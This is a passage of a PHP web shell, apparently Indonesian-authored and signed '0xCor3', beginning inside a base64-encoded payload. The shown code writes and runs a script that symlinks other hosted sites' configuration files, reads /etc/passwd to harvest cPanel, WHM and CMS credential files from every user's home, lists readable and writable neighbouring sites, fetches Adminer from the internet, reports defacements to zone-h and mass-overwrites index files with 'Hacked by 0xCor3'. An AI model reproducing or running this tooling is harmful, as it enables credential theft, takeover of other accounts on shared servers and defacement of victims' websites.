uJy1ob3N0aW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictaG9zdHMudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc3VibWl0dGlja2V0LnBocCcsJHNpdGVzcy4nLXdobWNzMi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnRzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictY2xpZW50cy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnQvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnQudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY2xpZW50ZXMvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnRlcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnRlL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictY2xpZW50LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NsaWVudHN1cHBvcnQvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnRzdXBwb3J0LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2JpbGxpbmcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1iaWxsaW5nLnR4dCcpOyANCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tYW5hZ2UvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0tbWFuYWdlLnR4dCcpOyANCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9teS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobS1teS50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbXlzaG9wL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htLW15c2hvcC50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywkc2l0ZXNzLictemVuY2FydC50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvemVuY2FydC9pbmNsdWRlcy9kaXN0LWNvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zaG9wLXplbmNhcnQudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3AvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywkc2l0ZXNzLictc2hvcC1aQ3Nob3AudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZi50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc21mL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZjIudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2ZvcnVtL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZi1mb3J1bS50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvZm9ydW1zL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZi1mb3J1bXMudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3VwbG9hZC9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdXAudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYXJ0aWNsZS9jb25maWcucGhwJywkc2l0ZXNzLictTndhaHkudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3VwL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRzaXRlc3MuJy11cDIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZl9nbG9iYWwucGhwJywkc2l0ZXNzLictNi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9pbmNsdWRlL2RiLnBocCcsJHNpdGVzcy4nLTcudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29ubmVjdC5waHAnLCRzaXRlc3MuJy1QSFAtRnVzaW9uLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL21rX2NvbmYucGhwJywkc2l0ZXNzLictOS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jb25maWcucGhwJywkc2l0ZXNzLictNGltYWdlcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlcy9kZWZhdWx0L3NldHRpbmdzLnBocCcsJHNpdGVzcy4nLURydXBhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tZW1iZXIvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy0xbWVtYmVyLnR4dCcpIDsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYmlsbGluZ3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1iaWxsaW5ncy50eHQnKSA7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwb3J0cy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXN1cHBvcnRzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3JlcXVpcmVzL2NvbmZpZy5waHAnLCRzaXRlc3MuJy1BTTRTUy1ob3N0aW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3N1cHBvcnRzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLXN1cHBvcnRzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NsaWVudC9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1jbGllbnQudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc3VwcG9ydC9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1zdXBwb3J0LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2JpbGxpbmcvaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtYmlsbGluZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9iaWxsaW5ncy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1iaWxsaW5ncy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ob3N0L2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3QudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaG9zdHMvaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtaG9zdHMudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaG9zdGluZy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1ob3N0aW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RpbmdzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3RpbmdzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RiaWxsaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtaG9zdGJpbGxzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3RiaWxsLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FwcC9ldGMvbG9jYWwueG1sJywkc2l0ZXNzLictTWFnZW50by50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hZG1pbi9jb25maWcucGhwJywkc2l0ZXNzLictT3BlbmNhcnQudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlnL3NldHRpbmdzLmluYy5waHAnLCRzaXRlc3MuJy1QcmVzdGFzaG9wLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NvbmZpZy9rb25la3NpLnBocCcsJHNpdGVzcy4nLUxva29tZWRpYS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9sb2tvbWVkaWEvY29uZmlnL2tvbmVrc2kucGhwJywkc2l0ZXNzLictTG9rb21lZGlhLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3NsY29uZmlnLnBocCcsJHNpdGVzcy4nLVNpdGVsb2NrLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FwcGxpY2F0aW9uL2NvbmZpZy9kYXRhYmFzZS5waHAnLCRzaXRlc3MuJy1FbGxpc2xhYi50eHQnKTsNCn0NCnByaW50ICJMb2NhdGlvbjogLi9cblxuIjs=";
340. $file = "0xS_config/vhost.cin";
341. $handle = fopen($file ,"w+");
342. fwrite($handle ,base64_decode($vhost));
343. fclose($handle);
344. chmod($file, 0755);
345. if(exe("cd 0xS_config && ./vhost.cin")) {
346. echo "<center><a href='$link_config/0xS_config'><font color=lime>Done</font></a></center>";
347. } else {
348. echo "<center><a href='$link_config/0xS_config/vhost.cin'><font color=lime>Done</font></a></center>";
349. }
350.  
351. } else {
352. $etc = fopen("/etc/passwd", "r") or die("<pre><font color=red>Can't read /etc/passwd</font></pre>");
353. while($passwd = fgets($etc)) {
354. if($passwd == "" || !$etc) {
355. echo "<font color=red>Can't read /etc/passwd</font>";
356. } else {
357. preg_match_all('/(.*?):x:/', $passwd, $user_config);
358. foreach($user_config[1] as $user_idx) {
359. $user_config_dir = "/home/$user_idx/public_html/";
360. if(is_readable($user_config_dir)) {
361. $grab_config = array(
362. "/home/$user_idx/.my.cnf" => "cpanel",
363. "/home/$user_idx/.accesshash" => "WHM-accesshash",
364. "$user_config_dir/po-content/config.php" => "Popoji",
365. "$user_config_dir/vdo_config.php" => "Voodoo",
366. "$user_config_dir/bw-configs/config.ini" => "BosWeb",
367. "$user_config_dir/config/koneksi.php" => "Lokomedia",
368. "$user_config_dir/lokomedia/config/koneksi.php" => "Lokomedia",
369. "$user_config_dir/clientarea/configuration.php" => "WHMCS",
370. "$user_config_dir/whm/configuration.php" => "WHMCS",
371. "$user_config_dir/whmcs/configuration.php" => "WHMCS",
372. "$user_config_dir/forum/config.php" => "phpBB",
373. "$user_config_dir/sites/default/settings.php" => "Drupal",
374. "$user_config_dir/config/settings.inc.php" => "PrestaShop",
375. "$user_config_dir/app/etc/local.xml" => "Magento",
376. "$user_config_dir/joomla/configuration.php" => "Joomla",
377. "$user_config_dir/configuration.php" => "Joomla",
378. "$user_config_dir/wp/wp-config.php" => "WordPress",
379. "$user_config_dir/wordpress/wp-config.php" => "WordPress",
380. "$user_config_dir/wp-config.php" => "WordPress",
381. "$user_config_dir/admin/config.php" => "OpenCart",
382. "$user_config_dir/slconfig.php" => "Sitelok",
383. "$user_config_dir/application/config/database.php" => "Ellislab");
384. foreach($grab_config as $config => $nama_config) {
385. $ambil_config = file_get_contents($config);
386. if($ambil_config == '') {
387. } else {
388. $file_config = fopen("0xS_config/$user_idx-$nama_config.txt","w");
389. fputs($file_config,$ambil_config);
390. }
391. }
392. }
393. }
394. }
395. }
396. echo "<center><a href='?dir=$path/0xS_config'><font color=lime>Done</font></a></center>";
397. }
398. }
399. elseif($_GET['do'] == 'jumping') {
400. $i = 0;
401. echo "<center>";
402. echo "<div class='margin: 5px auto;'>";
403. if(preg_match("/hsphere/", $path)) {
404. $urls = explode("\r\n", $_POST['url']);
405. if(isset($_POST['jump'])) {
406. echo "<pre>";
407. foreach($urls as $url) {
408. $url = str_replace(array("http://","www."), "", strtolower($url));
409. $etc = "/etc/passwd";
410. $f = fopen($etc,"r");
411. while($gets = fgets($f)) {
412. $pecah = explode(":", $gets);
413. $user = $pecah[0];
414. $dir_user = "/hsphere/local/home/$user";
415. if(is_dir($dir_user) === true) {
416. $url_user = $dir_user."/".$url;
417. if(is_readable($url_user)) {
418. $i++;
419. $jrw = "[<font color=lime>R</font>] <a href='?path=$url_user'><font color=gold>$url_user</font></a>";
420. if(is_writable($url_user)) {
421. $jrw = "[<font color=lime>RW</font>] <a href='?path=$url_user'><font color=gold>$url_user</font></a>";
422. }
423. echo $jrw."<br>";
424. }
425. }
426. }
427. }
428. if($i == 0) {
429. } else {
430. echo "<br>Total ada ".$i." Kamar di ".$ip;
431. }
432. echo "</pre>";
433. } else {
434. echo '<center>
435. <form method="post">
436. List Domains: <br>
437. <textarea name="url" style="width: 500px; height: 250px;">';
438. $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
439. while($getss = fgets($fp)) {
440. echo $getss;
441. }
442. echo '</textarea><br>
443. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
444. </form></center>';
445. }
446. } elseif(preg_match("/vhosts|vhost/", $path)) {
447. preg_match("/\/var\/www\/(.*?)\//", $path, $vh);
448. $urls = explode("\r\n", $_POST['url']);
449. if(isset($_POST['jump'])) {
450. echo "<pre>";
451. foreach($urls as $url) {
452. $url = str_replace("www.", "", $url);
453. $web_vh = "/var/www/".$vh[1]."/$url/httpdocs";
454. if(is_dir($web_vh) === true) {
455. if(is_readable($web_vh)) {
456. $i++;
457. $jrw = "[<font color=lime>R</font>] <a href='?path=$web_vh'><font color=gold>$web_vh</font></a>";
458. if(is_writable($web_vh)) {
459. $jrw = "[<font color=lime>RW</font>] <a href='?path=$web_vh'><font color=gold>$web_vh</font></a>";
460. }
461. echo $jrw."<br>";
462. }
463. }
464. }
465. if($i == 0) {
466. } else {
467. echo "<br>Total ada ".$i." Kamar di ".$ip;
468. }
469. echo "</pre>";
470. } else {
471. echo '<center>
472. <form method="post">
473. List Domains: <br>
474. <textarea name="url" style="width: 500px; height: 250px;">';
475. bing("ip:$ip");
476. echo '</textarea><br>
477. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
478. </form></center>';
479. }
480. } else {
481. echo "<pre>";
482. $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
483. while($passwd = fgets($etc)) {
484. if($passwd == '' || !$etc) {
485. echo "<font color=red>Can't read /etc/passwd</font>";
486. } else {
487. preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
488. foreach($user_jumping[1] as $user_idx_jump) {
489. $user_jumping_dir = "/home/$user_idx_jump/public_html";
490. if(is_readable($user_jumping_dir)) {
491. $i++;
492. $jrw = "[<font color=lime>R</font>] <a href='?path=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
493. if(is_writable($user_jumping_dir)) {
494. $jrw = "[<font color=lime>RW</font>] <a href='?path=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
495. }
496. echo $jrw;
497. if(function_exists('posix_getpwuid')) {
498. $domain_jump = file_get_contents("/etc/named.conf");
499. if($domain_jump == '') {
500. echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
501. } else {
502. preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
503. foreach($domains_jump[1] as $dj) {
504. $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
505. $user_jumping_url = $user_jumping_url['name'];
506. if($user_jumping_url == $user_idx_jump) {
507. echo " => ( <u>$dj</u> )<br>";
508. break;
509. }
510. }
511. }
512. } else {
513. echo "<br>";
514. }
515. }
516. }
517. }
518. }
519. if($i == 0) {
520. } else {
521. echo "<br>Total ada ".$i." Kamar di ".$ip;
522. }
523. echo "</pre>";
524. }
525. echo "</div>";
526. echo "</center>";
527. }
528. elseif($_GET['do'] == 'adminer') {
529. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $path);
530. function adminer($url, $isi) {
531. $fp = fopen($isi, "w");
532. $ch = curl_init();
533. curl_setopt($ch, CURLOPT_URL, $url);
534. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
535. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
536. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
537. curl_setopt($ch, CURLOPT_FILE, $fp);
538. return curl_exec($ch);
539. curl_close($ch);
540. fclose($fp);
541. ob_flush();
542. ob_flush();
543. ob_flush();
544. ob_flush();
545. flush();
546. }
547. if(file_exists('adminer.php')) {
548. echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
549. } else {
550. if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
551. echo "<center><font color=blue>Pasang Adminer Berhasil! <br> <a href='$full/adminer.php' target='_blank'>-->>>> Login Adminer <<<<--</a></font></center>";
552. } else {
553. echo "<center><font color=blue>gagal buat file adminer :(</font></center>";
554. }
555. }
556. }
557. elseif($_GET['do'] == 'zoneh') {
558. if($_POST['submit']) {
559. $domain = explode("\r\n", $_POST['url']);
560. $nick = $_POST['nick'];
561. echo "<center>Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a></center><br>";
562. echo "<center>Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a></center><br><br>";
563. function zoneh($url,$nick) {
564. $ch = curl_init("http://www.zone-h.com/notify/single");
565. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
566. curl_setopt($ch, CURLOPT_POST, true);
567. curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
568. return curl_exec($ch);
569. curl_close($ch);
570. }
571. foreach($domain as $url) {
572. $zoneh = zoneh($url,$nick);
573. if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
574. echo "$url -> <center><font color=lime>OK</font></center><br>";
575. } else {
576. echo "$url -> <center><font color=red>ERROR</font></center><br>";
577. }
578. }
579. } else {
580. echo "<center><form method='post'>
581. <u>Defacer</u>: <br>
582. <input type='text' name='nick' size='50' value='0xCor3'><br>
583. <u>Domains</u>: <br>
584. <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
585. <input type='submit' name='submit' value='Submit' style='width: 450px;'>
586. </form>";
587. }
588. echo "</center>";
589. }
590. elseif($_GET['do'] == 'mass_deface') {
591. function sabun_massal($path,$namafile,$isi_script) {
592. if(is_writable($path)) {
593. $dira = scandir($path);
594. foreach($dira as $dirb) {
595. $dirc = "$path/$dirb";
596. $lokasi = $dirc.'/'.$namafile;
597. if($dirb === '.') {
598. file_put_contents($lokasi, $isi_script);
599. } elseif($dirb === '..') {
600. file_put_contents($lokasi, $isi_script);
601. } else {
602. if(is_dir($dirc)) {
603. if(is_writable($dirc)) {
604. echo "[<font color=lime>DONE</font>] $lokasi<br>";
605. file_put_contents($lokasi, $isi_script);
606. $idx = sabun_massal($dirc,$namafile,$isi_script);
607. }
608. }
609. }
610. }
611. }
612. }
613. function sabun_biasa($path,$namafile,$isi_script) {
614. if(is_writable($path)) {
615. $dira = scandir($path);
616. foreach($dira as $dirb) {
617. $dirc = "$path/$dirb";
618. $lokasi = $dirc.'/'.$namafile;
619. if($dirb === '.') {
620. file_put_contents($lokasi, $isi_script);
621. } elseif($dirb === '..') {
622. file_put_contents($lokasi, $isi_script);
623. } else {
624. if(is_dir($dirc)) {
625. if(is_writable($dirc)) {
626. echo "[<font color=lime>DONE</font>] $dirb/$namafile<br>";
627. file_put_contents($lokasi, $isi_script);
628. }
629. }
630. }
631. }
632. }
633. }
634. if($_POST['start']) {
635. if($_POST['tipe_sabun'] == 'mahal') {
636. echo "<div style='margin: 5px auto; padding: 5px'>";
637. sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
638. echo "</div>";
639. } elseif($_POST['tipe_sabun'] == 'murah') {
640. echo "<div style='margin: 5px auto; padding: 5px'>";
641. sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
642. echo "</div>";
643. }
644. } else {
645. echo "<center><form method='post'>
646. <font style='text-decoration: underline;'>Tipe Sabun:</font><br>
647. <input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input type='radio' name='tipe_sabun' value='mahal'>Massal<br>
648. <font style='text-decoration: underline;'>Folder:</font><br>
649. <input type='text' name='d_dir' value='$path' style='width: 450px;' height='10'><br>
650. <font style='text-decoration: underline;'>Filename:</font><br>
651. <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
652. <font style='text-decoration: underline;'>Index File:</font><br>
653. <textarea name='script' style='width: 450px; height: 200px;'>Hacked by 0xCor3</textarea><br>
654. <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
655. </form></center>";
656. }
657. }
658. ?>